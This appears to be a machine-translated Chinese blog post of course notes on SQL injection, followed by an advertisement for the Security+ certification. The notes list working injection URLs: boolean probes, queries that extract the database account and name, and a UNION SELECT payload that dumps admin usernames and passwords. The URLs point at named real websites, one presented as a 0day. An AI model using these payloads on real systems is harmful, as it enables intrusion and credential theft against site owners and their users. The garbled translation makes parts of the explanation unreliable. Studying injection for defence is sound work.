The principle of SQL injection Vulnerability in "Safe cow learning Notes"

The Web site does not filter the characters entered, causing the input characters to affect the query of the site data.

Programming mathematical logic thinking and or XOR and or no
Or: There is a truth that is true
And: There is a false is false
No: instead

How to find out if there is an injection vulnerability?
The first to find a Web site that matches the parameter link
The second judge whether there is an injection
The third implementation of injection attacks

Analyze the SQL injection process:
The first step is to guess the table name
Second step to guess the list name
The third step to guess the content

Three major web submissions: GET POST COOKIE

Get: Access address directly above the browser
Post: Button event (member registration, file upload, etc.)
Cookie: Access the value of the authentication that comes with the site

Normal injection no way, you can try the case, encoding, etc. bypass

Detailed description of the major parameter types: Character type, digital type, search type
Character type: ABCD ..... 26 English characters Chinese
Digital type: 0-9
Search: Search Keywords
What is the representation of the data for the character type in programming?
0123456789 "A" ' B ' a variable constant

Injection in each of the major types: Before our injection is basically digital type, the front injection statements are based on digital injection
Character-type injection:
Http://localhost:2008/chanpin.asp?bigclassname= Product Introduction &smallclassname= Pet Bag
Http://localhost:2008/chanpin.asp?bigclassname= Product Introduction &smallclassname= pet Pack ' +and+ ' 1 ' = ' 1 returned to normal.
Http://localhost:2008/chanpin.asp?bigclassname= Product Introduction &smallclassname= pet Pack ' +and+ ' 1 ' = ' 2 return error.
Search-Injection:
Http://www.myhack58.com/product/list_search.aspx?search=Donic
http://www.myhack58.com/product/list_search.aspx?search=Donic% ' and user>0 and '% ' = '//get current Database account
http://www.myhack58.com/product/list_search.aspx?search=Donic% ' and db_name () >0 and '% ' = '//Get the current database name
http://www.myhack58.com/product/list_search.aspx?search=Donic% ' and (select COUNT (*) from admin) >0 and '% ' = '// Return to the error page, it seems that there is no admin this table
Code Audit: Southern Data 0day Analysis
Http://www.xxx.com/NewsType.asp? smallclass= ' Union select 0,USERNAME+CHR (124) +password,2,3,4,5,6,7,8,9 from admin Union SELECT * FROM news where 1=2 and ' =
Http://www.chinafxhb.com/NewsType.asp? Smallclass= '%20UNION%20SELECT%200,USERNAME%2BCHR (124)%2bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union% 20select%20*%20from%20news%20where%201=2%20and%20 ' = '
SELECT * from News where Bigclassname= ' "& Bigclass &" ' and Smallclassname= ' "' Union select 0,USERNAME+CHR (124) +pa ssword,2,3,4,5,6,7,8,9 from admin Union SELECT * FROM news where 1=2 "' ORDER BY adddate Desc

This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes

security+ Certification Why is the Internet + era of the most popular certification?

Manifesto first introduce you to security+

security+ certification is a neutral third-party certification, the issuing agency for the United States Computer Industry Association CompTIA, and CISSP, ITIL and other common inclusion of the international IT Industry 10 Popular certification, and CISSP emphasis on information security management, compared to security+ Authentication is more emphasis on information security technology and operations.

This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.

Why is security+ certification so hot?

Reason one: In all information security certification, the emphasis on information security technology certification is blank, security+ certification just can make up for information security technology field blank.

Reason three: grounding gas, international stylish, easy to test, moderate cost!

As the most influential global leader in the global ICT sector, CompTIA is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.

Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification.

This article is from the "11662938" blog, please be sure to keep this source http://11672938.blog.51cto.com/11662938/1977852

The principle of SQL injection Vulnerability in "Safe cow learning Notes"